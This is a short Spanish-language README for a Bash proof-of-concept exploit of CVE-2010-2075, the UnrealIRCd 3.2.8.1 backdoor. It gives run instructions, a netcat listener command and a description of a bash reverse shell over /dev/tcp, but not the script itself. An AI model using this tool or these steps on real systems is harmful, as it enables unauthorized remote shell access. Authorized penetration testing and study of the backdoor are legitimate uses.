
Exploit de CVE-2010-2075
PoC en Bash para la backdoor introducida en el tarball fuente de UnrealIRCd 3.2.8.1.
El binario comprometido ejecuta comandos arbitrarios con el prefijo AB; enviados al puerto IRC.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Ejemplo:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Configure un listener antes de ejecutar:
nc -lvnp 4444
La backdoor verifica los datos entrantes buscando el prefijo AB; y pasa el resto al shell del sistema. El payload envía una reverse shell de bash a través de /dev/tcp.
Solo para fines educativos y pruebas autorizadas.